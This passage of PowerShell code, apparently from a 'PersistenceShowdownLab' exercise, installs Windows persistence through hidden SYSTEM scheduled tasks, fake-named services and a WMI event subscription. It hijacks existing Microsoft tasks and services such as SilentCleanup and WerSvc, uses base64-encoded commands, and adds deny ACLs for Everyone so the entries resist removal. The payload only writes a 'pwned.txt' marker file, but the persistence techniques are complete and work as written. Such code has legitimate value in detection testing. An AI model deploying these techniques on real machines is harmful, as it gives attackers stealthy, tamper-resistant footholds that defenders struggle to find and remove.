$psExe = Join-Path $env:WINDIR 'System32\WindowsPowerShell\v1.0\powershell.exe'
$cmdExe = Join-Path $env:WINDIR 'System32\cmd.exe'
$wscriptExe = Join-Path $env:WINDIR 'System32\wscript.exe'

$newTaskNames = @(
    'ProfileCacheStartup',
    'CloudSyncLogon',
    'WinUpdateCacheStartup'
)

$existingTaskCandidates = @(
    [ordered]@{ TaskPath = '\Microsoft\Windows\Application Experience\'; TaskName = 'ProgramDataUpdater' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Customer Experience Improvement Program\'; TaskName = 'Consolidator' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\DiskCleanup\'; TaskName = 'SilentCleanup' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Windows Error Reporting\'; TaskName = 'QueueReporting' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Maintenance\'; TaskName = 'WinSAT' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Maps\'; TaskName = 'MapsUpdateTask' }
)

function Write-Step { param([string]$Text) Write-Host "[*] $Text" -ForegroundColor Cyan }
function Write-OK { param([string]$Text) Write-Host "    [OK] $Text" -ForegroundColor Green }
function Write-Warn { param([string]$Text) Write-Host "    [WARN] $Text" -ForegroundColor Yellow }

function Get-LabTaskFilePath {
    param([string]$Path, [string]$Name)

    $relativePath = $Path.Trim('\')
    $taskRoot = Join-Path $env:WINDIR 'System32\Tasks'
    if ([string]::IsNullOrWhiteSpace($relativePath)) {
        return Join-Path $taskRoot $Name
    }
    return Join-Path (Join-Path $taskRoot $relativePath) $Name
}

function Get-LabTaskCacheTreePath {
    param([string]$Path, [string]$Name)

    $parts = @()
    $relativePath = $Path.Trim('\')
    if (-not [string]::IsNullOrWhiteSpace($relativePath)) { $parts += $relativePath }
    $parts += $Name
    return "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\$($parts -join '\')"
}

function Add-LabFileDenyRule {
    param([string]$Path)

    try {
        if (-not (Test-Path -LiteralPath $Path)) {
            Write-Warn "ACL hardening skipped, file not found: $Path"
            return
        }

        $everyoneSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'
        $rights = [System.Security.AccessControl.FileSystemRights]::Delete -bor
            [System.Security.AccessControl.FileSystemRights]::Write -bor
            [System.Security.AccessControl.FileSystemRights]::WriteData -bor
            [System.Security.AccessControl.FileSystemRights]::AppendData
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
            $everyoneSid,
            $rights,
            [System.Security.AccessControl.AccessControlType]::Deny
        )

        $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
        $acl.AddAccessRule($rule)
        Set-Acl -LiteralPath $Path -AclObject $acl -ErrorAction Stop
        Write-OK "Hardened file ACL: $Path"
    } catch {
        Write-Warn "Could not harden file ACL '$Path': $_"
    }
}

function Add-LabRegistryDenyRule {
    param([string]$Path)

    try {
        if (-not (Test-Path -Path $Path)) {
            Write-Warn "ACL hardening skipped, registry key not found: $Path"
            return
        }

        $everyoneSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'
        $rights = [System.Security.AccessControl.RegistryRights]::Delete -bor
            [System.Security.AccessControl.RegistryRights]::SetValue
        $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            $everyoneSid,
            $rights,
            [System.Security.AccessControl.InheritanceFlags]::None,
            [System.Security.AccessControl.PropagationFlags]::None,
            [System.Security.AccessControl.AccessControlType]::Deny
        )

        $acl = Get-Acl -Path $Path -ErrorAction Stop
        $acl.AddAccessRule($rule)
        Set-Acl -Path $Path -AclObject $acl -ErrorAction Stop
        Write-OK "Hardened registry ACL: $Path"
    } catch {
        Write-Warn "Could not harden registry ACL '$Path': $_"
    }
}

function Protect-NewLabTask {
    param([string]$Path, [string]$Name)

    Add-LabFileDenyRule -Path (Get-LabTaskFilePath -Path $Path -Name $Name)
    Add-LabRegistryDenyRule -Path (Get-LabTaskCacheTreePath -Path $Path -Name $Name)
}

function Invoke-ScheduledTaskAttempt {
    param([string]$Name, [scriptblock]$ScriptBlock)

    try {
        & $ScriptBlock
    } catch {
        Write-Warn "Scheduled task attempt '$Name' failed: $_"
    }
}

function Get-TaskIdentity {
    param([string]$Path, [string]$Name)
    if (-not $Path.EndsWith('\')) { $Path += '\' }
    return "$Path$Name"
}

function Remove-NewLabTasks {
    foreach ($name in $newTaskNames) {
        try {
            Unregister-ScheduledTask -TaskName $name -TaskPath $taskPath -Confirm:$false -ErrorAction SilentlyContinue
            & schtasks.exe /Delete /TN "$taskPath$name" /F 2>$null | Out-Null
        } catch {}
    }
}

function New-PayloadScript {
    param([string]$Path, [int]$DelaySeconds = 0)

    $content = @"
`$ErrorActionPreference = 'SilentlyContinue'
if ($DelaySeconds -gt 0) { Start-Sleep -Seconds $DelaySeconds }
New-Item -ItemType Directory -Path 'C:\Users\Public\Documents' -Force | Out-Null
Set-Content -LiteralPath 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -NoNewline -Encoding ASCII
"@
    Set-Content -LiteralPath $Path -Value $content -Encoding ASCII -ErrorAction Stop
}

function New-PayloadVbs {
    param([string]$Path)

    $content = @'
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists("C:\Users\Public\Documents") Then
    fso.CreateFolder("C:\Users\Public\Documents")
End If
Set f = fso.CreateTextFile("C:\Users\Public\Documents\pwned.txt", True)
f.Write "Pwn3d"
f.Close
'@
    Set-Content -LiteralPath $Path -Value $content -Encoding ASCII -ErrorAction Stop
}

function New-EncodedPayload {
    $command = "New-Item -ItemType Directory -Path 'C:\Users\Public\Documents' -Force | Out-Null; Set-Content -LiteralPath 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -NoNewline -Encoding ASCII"
    return [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
}

function Register-LabTask {
    param(
        [string]$Path,
        [string]$Name,
        [string]$Description,
        $Action,
        $Trigger,
        [switch]$Hidden,
        [switch]$ProtectAcl
    )

    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
    $settingsArgs = @{
        AllowStartIfOnBatteries = $true
        DontStopIfGoingOnBatteries = $true
        StartWhenAvailable = $true
        MultipleInstances = 'IgnoreNew'
        ExecutionTimeLimit = (New-TimeSpan -Minutes 5)
    }
    if ($Hidden) { $settingsArgs['Hidden'] = $true }
    $settings = New-ScheduledTaskSettingsSet @settingsArgs

    Register-ScheduledTask -TaskName $Name -TaskPath $Path -Action $Action -Trigger $Trigger -Principal $principal -Settings $settings -Description $Description -Force -ErrorAction Stop | Out-Null
    Write-OK "Registered $(Get-TaskIdentity $Path $Name)"
    if ($ProtectAcl) {
        Protect-NewLabTask -Path $Path -Name $Name
    }
}

function Get-HijackTargets {
    $targets = @()
    foreach ($candidate in $existingTaskCandidates) {
        try {
            $task = Get-ScheduledTask -TaskPath $candidate.TaskPath -TaskName $candidate.TaskName -ErrorAction Stop
            if ($null -ne $task) {
                $targets += $candidate
                if ($targets.Count -ge 2) { break }
            }
        } catch {}
    }
    return @($targets)
}

Write-Step "Preparing scheduled task helper files"
$profileCacheScript = Join-Path $workDir 'profile-cache.ps1'
$delayedScript = Join-Path $workDir 'userinit-bridge.ps1'
$vbsScript = Join-Path $workDir 'event-cache.vbs'
$helpersReady = $false
try {
    New-Item -ItemType Directory -Path $workDir -Force -ErrorAction Stop | Out-Null
    New-PayloadScript -Path $profileCacheScript
    New-PayloadScript -Path $delayedScript -DelaySeconds 20
    New-PayloadVbs -Path $vbsScript
    $helpersReady = $true
    Write-OK "Helper files written to $workDir"
} catch {
    Write-Warn "Could not prepare scheduled task helper files: $_"
}

Write-Step "Removing previous lab-owned new tasks"
try {
    Remove-NewLabTasks
    Write-OK "Removed lab-owned new tasks if present"
} catch {
    Write-Warn "Could not remove previous lab-owned new tasks: $_"
}

Write-Step "Installing 3 new scheduled task persistence variants"
$encoded = ''
try {
    $encoded = New-EncodedPayload
} catch {
    Write-Warn "Could not generate encoded scheduled task payload: $_"
}

Invoke-ScheduledTaskAttempt 'ProfileCacheStartup' {
    if (-not $helpersReady) { throw 'helper files were not prepared' }
    Register-LabTask `
        -Path $taskPath `
        -Name 'ProfileCacheStartup' `
        -Description 'Profile cache maintenance task.' `
        -Action (New-ScheduledTaskAction -Execute $psExe -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$profileCacheScript`"" -WorkingDirectory $workDir) `
        -Trigger (New-ScheduledTaskTrigger -AtStartup) `
        -Hidden `
        -ProtectAcl
}

Invoke-ScheduledTaskAttempt 'CloudSyncLogon' {
    Register-LabTask `
        -Path $taskPath `
        -Name 'CloudSyncLogon' `
        -Description 'Cloud sync logon maintenance task.' `
        -Action (New-ScheduledTaskAction -Execute $cmdExe -Argument "/c echo $payloadText>$payloadPath") `
        -Trigger (New-ScheduledTaskTrigger -AtLogOn) `
        -ProtectAcl
}

Invoke-ScheduledTaskAttempt 'WinUpdateCacheStartup' {
    if ([string]::IsNullOrWhiteSpace($encoded)) { throw 'encoded payload was not generated' }
    Register-LabTask `
        -Path $taskPath `
        -Name 'WinUpdateCacheStartup' `
        -Description 'Windows update cache startup task.' `
        -Action (New-ScheduledTaskAction -Execute $psExe -Argument "-NoProfile -ExecutionPolicy Bypass -EncodedCommand $encoded") `
        -Trigger (New-ScheduledTaskTrigger -AtStartup) `
        -Hidden `
        -ProtectAcl
}

Write-Step "Overwriting 2 existing scheduled task names"
$targets = @(Get-HijackTargets)
if ($targets.Count -lt 2) {
    Write-Warn "Only found $($targets.Count) existing task candidate(s). The script will overwrite what it found."
}

$i = 0
foreach ($target in $targets) {
    try {
        if ($i -eq 0) {
            if (-not $helpersReady) { throw 'helper files were not prepared' }
            Register-LabTask `
                -Path $target.TaskPath `
                -Name $target.TaskName `
                -Description 'Windows task maintenance action.' `
                -Action (New-ScheduledTaskAction -Execute $psExe -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$delayedScript`"" -WorkingDirectory $workDir) `
                -Trigger (New-ScheduledTaskTrigger -AtStartup) `
                -Hidden
        } else {
            if (-not $helpersReady) { throw 'helper files were not prepared' }
            Register-LabTask `
                -Path $target.TaskPath `
                -Name $target.TaskName `
                -Description 'Windows script host maintenance action.' `
                -Action (New-ScheduledTaskAction -Execute $wscriptExe -Argument "//B `"$vbsScript`"" -WorkingDirectory $workDir) `
                -Trigger (New-ScheduledTaskTrigger -AtStartup)
        }
        $i++
    } catch {
        Write-Warn "Could not overwrite $(Get-TaskIdentity $target.TaskPath $target.TaskName): $_"
    }
}

Write-Host ""
Write-Host "[DONE] Installed scheduled task persistences." -ForegroundColor Green
Write-Host "Created 3 new tasks and attempted to overwrite 2 existing task candidates." -ForegroundColor Yellow

# === MODULE: windows_services.ps1 ===
$workDir = Join-Path $env:ProgramData 'PersistenceShowdownLab\Services'
$payloadPath = 'C:\Users\Public\Documents\pwned.txt'
$payloadText = 'Pwn3d'
$psExe = Join-Path $env:WINDIR 'System32\WindowsPowerShell\v1.0\powershell.exe'
$cmdExe = Join-Path $env:WINDIR 'System32\cmd.exe'
$wscriptExe = Join-Path $env:WINDIR 'System32\wscript.exe'

$newServiceNames = @(
    'ProfileCacheSvc',
    'WinUpdateCacheSvc',
    'ScriptHostTelemetrySvc'
)

# Availability varies by Windows 11 image. These are chosen to avoid boot-critical services.
$existingServiceCandidates = @(
    'Fax',
    'RetailDemo',
    'MapsBroker',
    'WMPNetworkSvc',
    'XblGameSave',
    'WalletService',
    'lfsvc',
    'WerSvc'
)

function Write-Step { param([string]$Text) Write-Host "[*] $Text" -ForegroundColor Cyan }
function Write-OK { param([string]$Text) Write-Host "    [OK] $Text" -ForegroundColor Green }
function Write-Warn { param([string]$Text) Write-Host "    [WARN] $Text" -ForegroundColor Yellow }

function Add-LabServiceRegistryDenyRule {
    param([string]$Name)

    $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    try {
        if (-not (Test-Path -Path $path)) {
            Write-Warn "ACL hardening skipped, service key not found: $path"
            return
        }

        $everyoneSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'
        $rights = [System.Security.AccessControl.RegistryRights]::Delete -bor
            [System.Security.AccessControl.RegistryRights]::SetValue
        $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            $everyoneSid,
            $rights,
            [System.Security.AccessControl.InheritanceFlags]::None,
            [System.Security.AccessControl.PropagationFlags]::None,
            [System.Security.AccessControl.AccessControlType]::Deny
        )

        $acl = Get-Acl -Path $path -ErrorAction Stop
        $acl.AddAccessRule($rule)
        Set-Acl -Path $path -AclObject $acl -ErrorAction Stop
        Write-OK "Hardened service registry ACL: $path"
    } catch {
        Write-Warn "Could not harden service registry ACL '$path': $_"
    }
}

function Invoke-ServiceAttempt {
    param([string]$Name, [scriptblock]$ScriptBlock)

    try {
        & $ScriptBlock
    } catch {
        Write-Warn "Service attempt '$Name' failed: $_"
    }
}

function Remove-LabService {
    param([string]$Name)

    $service = Get-Service -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $service) { return }

    try {
        if ($service.Status -ne 'Stopped') {
            Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue
        }
    } catch {}

    & sc.exe delete $Name | Out-Null
    for ($i = 0; $i -lt 20; $i++) {
        if ($null -eq (Get-Service -Name $Name -ErrorAction SilentlyContinue)) { break }
        Start-Sleep -Milliseconds 250
    }
}

function Remove-NewLabServices {
    foreach ($name in $newServiceNames) {
        Remove-LabService -Name $name
    }
}

function New-PayloadScript {
    param([string]$Path, [int]$DelaySeconds = 0)

    $content = @"
`$ErrorActionPreference = 'SilentlyContinue'
if ($DelaySeconds -gt 0) { Start-Sleep -Seconds $DelaySeconds }
New-Item -ItemType Directory -Path 'C:\Users\Public\Documents' -Force | Out-Null
Set-Content -LiteralPath 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -NoNewline -Encoding ASCII
"@
    Set-Content -LiteralPath $Path -Value $content -Encoding ASCII -ErrorAction Stop
}

function New-PayloadVbs {
    param([string]$Path)

    $content = @'
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists("C:\Users\Public\Documents") Then
    fso.CreateFolder("C:\Users\Public\Documents")
End If
Set f = fso.CreateTextFile("C:\Users\Public\Documents\pwned.txt", True)
f.Write "Pwn3d"
f.Close
'@
    Set-Content -LiteralPath $Path -Value $content -Encoding ASCII -ErrorAction Stop
}

function New-EncodedPayload {
    $command = "New-Item -ItemType Directory -Path 'C:\Users\Public\Documents' -Force | Out-Null; Set-Content -LiteralPath 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -NoNewline -Encoding ASCII"
    return [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
}

function New-LabService {
    param(
        [string]$Name,
        [string]$DisplayName,
        [string]$Description,
        [string]$BinaryPath,
        [switch]$DelayedAuto
    )

    Remove-LabService -Name $Name

    & sc.exe create $Name binPath= $BinaryPath start= auto obj= LocalSystem DisplayName= $DisplayName | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "sc.exe create failed for $Name"
    }

    & sc.exe description $Name $Description | Out-Null
    if ($DelayedAuto) {
        & sc.exe config $Name start= delayed-auto | Out-Null
    }

    Add-LabServiceRegistryDenyRule -Name $Name
    Write-OK "Created service $Name"
}

function Set-ExistingServicePersistence {
    param([string]$Name, [string]$BinaryPath, [switch]$DelayedAuto)

    & sc.exe config $Name binPath= $BinaryPath start= auto | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "sc.exe config failed for $Name"
    }
    if ($DelayedAuto) {
        & sc.exe config $Name start= delayed-auto | Out-Null
    }
    Write-OK "Overwrote existing service name $Name"
}

function Get-HijackTargets {
    $targets = @()
    foreach ($name in $existingServiceCandidates) {
        try {
            $svc = Get-WmiObject Win32_Service -Filter "Name='$name'" -ErrorAction Stop
            if ($null -ne $svc) {
                $targets += $name
                if ($targets.Count -ge 2) { break }
            }
        } catch {}
    }
    return @($targets)
}

Write-Step "Preparing service helper files"
$profileCacheScript = Join-Path $workDir 'svc-profile-cache.ps1'
$eventBridgeScript = Join-Path $workDir 'svc-event-bridge.ps1'
$vbsScript = Join-Path $workDir 'svc-script-host.vbs'
$helpersReady = $false
try {
    New-Item -ItemType Directory -Path $workDir -Force -ErrorAction Stop | Out-Null
    New-PayloadScript -Path $profileCacheScript
    New-PayloadScript -Path $eventBridgeScript -DelaySeconds 15
    New-PayloadVbs -Path $vbsScript
    $helpersReady = $true
    Write-OK "Helper files written to $workDir"
} catch {
    Write-Warn "Could not prepare service helper files: $_"
}

Write-Step "Removing previous lab-owned new services"
try {
    Remove-NewLabServices
    Write-OK "Removed lab-owned new services if present"
} catch {
    Write-Warn "Could not remove previous lab-owned new services: $_"
}

Write-Step "Installing 3 new Windows service persistence variants"
$encoded = ''
try {
    $encoded = New-EncodedPayload
} catch {
    Write-Warn "Could not generate encoded service payload: $_"
}

Invoke-ServiceAttempt 'ProfileCacheSvc' {
    if (-not $helpersReady) { throw 'helper files were not prepared' }
    New-LabService `
        -Name 'ProfileCacheSvc' `
        -DisplayName 'Profile Cache Maintenance' `
        -Description 'Profile cache maintenance service.' `
        -BinaryPath "`"$psExe`" -NoProfile -ExecutionPolicy Bypass -File `"$profileCacheScript`""
}

Invoke-ServiceAttempt 'WinUpdateCacheSvc' {
    if ([string]::IsNullOrWhiteSpace($encoded)) { throw 'encoded payload was not generated' }
    New-LabService `
        -Name 'WinUpdateCacheSvc' `
        -DisplayName 'Windows Update Cache Monitor' `
        -Description 'Windows update cache monitor service.' `
        -BinaryPath "`"$psExe`" -NoProfile -ExecutionPolicy Bypass -EncodedCommand $encoded" `
        -DelayedAuto
}

Invoke-ServiceAttempt 'ScriptHostTelemetrySvc' {
    if (-not $helpersReady) { throw 'helper files were not prepared' }
    New-LabService `
        -Name 'ScriptHostTelemetrySvc' `
        -DisplayName 'Script Host Telemetry' `
        -Description 'Script host telemetry service.' `
        -BinaryPath "$wscriptExe //B `"$vbsScript`""
}

Write-Step "Overwriting 2 existing service names"
$targets = @(Get-HijackTargets)
if ($targets.Count -lt 2) {
    Write-Warn "Only found $($targets.Count) existing service candidate(s). The script will overwrite what it found."
}

$i = 0
foreach ($target in $targets) {
    try {
        if ($i -eq 0) {
            if (-not $helpersReady) { throw 'helper files were not prepared' }
            Set-ExistingServicePersistence `
                -Name $target `
                -BinaryPath "`"$psExe`" -NoProfile -ExecutionPolicy Bypass -File `"$eventBridgeScript`"" `
                -DelayedAuto
        } else {
            Set-ExistingServicePersistence `
                -Name $target `
                -BinaryPath "$cmdExe /c if not exist C:\Users\Public\Documents mkdir C:\Users\Public\Documents & echo $payloadText>$payloadPath"
        }
        $i++
    } catch {
        Write-Warn "Could not overwrite existing service $target`: $_"
    }
}

Write-Host ""
Write-Host "[DONE] Installed Windows service persistences." -ForegroundColor Green
Write-Host "Created 3 new services and attempted to overwrite 2 existing service candidates." -ForegroundColor Yellow

# === MODULE: wmi_attack.ps1 ===
$FilterArgs = @{name='WindowsUpdate';
                EventNameSpace='root\CimV2';
                QueryLanguage="WQL";
                Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs

$ConsumerArgs = @{ name = 'WindowsUpdate'; 
                CommandLineTemplate = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "Set-Content -Path ''C:\Users\Public\Documents\pwned.txt'' -Value ''Pwn3d'' -Encoding UTF8"'; }
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs

$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
